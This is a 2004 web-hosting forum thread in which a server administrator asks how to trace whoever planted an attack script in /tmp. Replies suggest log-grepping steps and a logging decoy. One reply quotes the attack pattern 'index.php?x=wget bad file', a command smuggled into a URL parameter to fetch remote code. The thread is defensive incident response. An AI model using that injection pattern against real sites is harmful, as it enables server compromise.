Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

how to track hacker?

Discussion in 'General Discussion' started by 10101, Jun 14, 2004.

  1. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166
    Hi,

    I keep seeing files like "extrupator.pl" in my tmp folder which are attempts to hack the server.

    I think they are uploaded through a site which has a vunerable script, but I am not sure what commands to run to catch this little sod.

    What lines should i run to find out who uploaded/ran extrupator.pl?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  2. AlexSmithMCP

    AlexSmithMCP Well-Known Member

    Joined:
    May 26, 2004
    Messages:
    66
    Likes Received:
    0
    Trophy Points:
    156
    cPanel Access Level:
    Root Administrator
    u could replace the script with one that logs there IP and
    as well as the hostname it was ran through (i think that can be done) that should help u find them :) make sure it emails it to an off site email address tho....
     
  3. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166
    that would be cool, where would i get such a script?
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,366
    Likes Received:
    6
    Trophy Points:
    168
    cPanel Access Level:
    Root Administrator
  5. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. Ben

    Ben Well-Known Member

    Joined:
    Aug 19, 2002
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    156
    If you are using phpSuExec, then determining the vulnerable site is easy.

    If you aren't, it's harder.

    If you are, run

    ls -la file.pl

    That should tell you the owner of the file.

    Then goto /usr/local/apache/domlogs/ and run

    grep wget `ls | grep username`

    This should then show all instances where attempts to wget a file were logged. This is usually a good indication of a vulnerable script, usually something like

    index.php?x=wget bad file

    What you do with the site from there is up to you.

    If you don't use phpSuExec, then you can run the following, please note that this command can be load intensive and take a while to run

    grep filename.pl *.com

    If no results, proceed to other TLD's on your machine, ex

    grep filename.pl *.net

    That will show you instances where most likely the file was wget'ed, and can also determine the site, yet again, what to do with is up to you.

    HTH,

    Ben
     
  7. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,366
    Likes Received:
    6
    Trophy Points:
    168
    cPanel Access Level:
    Root Administrator
  8. 10101

    10101 Well-Known Member

    Joined:
    Sep 4, 2003
    Messages:
    151
    Likes Received:
    0
    Trophy Points:
    166
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice